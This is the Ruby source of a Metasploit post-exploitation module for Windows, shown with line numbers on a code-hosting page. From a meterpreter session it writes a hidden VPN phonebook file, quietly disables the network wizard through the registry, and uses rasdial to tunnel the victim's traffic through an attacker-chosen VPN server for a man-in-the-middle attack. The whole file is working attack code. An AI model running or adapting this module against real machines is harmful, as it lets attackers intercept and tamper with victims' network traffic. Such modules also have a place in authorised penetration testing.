Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::Priv
9
  include Msf::Post::Windows::Registry
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Windows Manage Remote Point-to-Point Tunneling Protocol',
16
        'Description' => %q{
17
          This module initiates a PPTP connection to a remote machine (VPN server). Once
18
          the tunnel is created we can use it to force the victim traffic to go through the
19
          server getting a man in the middle attack. Be sure to allow forwarding and
20
          masquerading on the VPN server (mitm).
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
24
        'References' => [
25
          [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ]
26
        ],
27
        'Platform' => 'win',
28
        'SessionTypes' => [ 'meterpreter' ]
29
      )
30
    )
31

32
    register_options(
33
      [
34
        OptString.new('USERNAME', [true, 'VPN Username.' ]),
35
        OptString.new('PASSWORD', [true, 'VPN Password.' ]),
36
        OptBool.new('MITM', [true, 'Man in the middle.', true]),
37
        OptInt.new('TIMEOUT', [true, 'Timeout for the tunnel creation.', 60]),
38
        OptString.new('PBK_NAME', [true, 'PhoneBook entry name.', 'MSF']),
39
        OptAddress.new('VPNHOST', [true, 'VPN server.'])
40
      ]
41
    )
42
  end
43

44
  def run
45
    version = get_version_info
46
    disable_network_wizard if version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win7_SP1)
47

48
    pbk = create_pbk(datastore['MITM'], datastore['PBK_NAME'])
49
    to = (datastore['TIMEOUT'] <= 0) ? 60 : datastore['TIMEOUT']
50
    begin
51
      ::Timeout.timeout(to) do
52
        run_rasdial(pbk, datastore['USERNAME'], datastore['PASSWORD'], datastore['VPNHOST'], datastore['PBK_NAME'])
53
      end
54
    rescue ::Timeout::Error
55
      print_error("Timeout after #{to} seconds")
56
    end
57
    file_rm(pbk)
58
    print_status('Phonebook deleted')
59
  end
60

61
  def disable_network_wizard
62
    if !is_admin?
63
      print_error("You don't have enough privileges to change the registry. Network Wizard will not be disabled")
64
      return
65
    end
66

67
    key = 'HKLM\\System\\CurrentControlSet\\Control\\Network'
68
    value = 'NewNetworkWindowOff'
69
    begin
70
      if !registry_getvaldata(key, value)
71
        registry_setvaldata(key, value, 3, 'REG_BINARY')
72
        print_good('Network Wizard disabled')
73
      end
74
    rescue ::Exception => e
75
      print_status("The fo llowing Error was encountered: #{e.class} #{e}")
76
    end
77
  end
78

79
  def create_pbk(mim, pbk_name)
80
    pbk_dir = expand_path('%TEMP%')
81
    pbk_file = pbk_dir << '\\' << Rex::Text.rand_text_alpha(rand(6..13)) << '.pbk'
82

83
    conf_conn = "[#{pbk_name}]\r\n\r\n"
84
    conf_conn += "MEDIA=rastapi\r\n"
85
    conf_conn += "Port=VPN4-0\r\n"
86
    conf_conn += "DEVICE=vpn\r\n"
87
    conf_conn += "IpPrioritizeRemote=0\r\n" unless mim
88

89
    if write_file(pbk_file, conf_conn)
90
      print_good("PhoneBook configuration written to #{pbk_file}")
91
      return pbk_file
92
    end
93
  end
94

95
  def run_rasdial(pbk, user, pass, vpn_host, pbk_name)
96
    print_status('Establishing connection ...')
97
    cmd_exec('rasdial', '/disconnect')
98
    output_run = cmd_exec('rasdial', "#{pbk_name} #{user} #{pass} /PHONE:#{vpn_host} /PHONEBOOK:#{pbk}")
99
    output_view = cmd_exec('rasdial', nil)
100

101
    if output_view =~ /#{pbk_name}/i
102
      print_good('Connection Successful')
103
    else
104
      print_error("Connection failure: #{output_run}")
105
    end
106
  end
107
end
108

109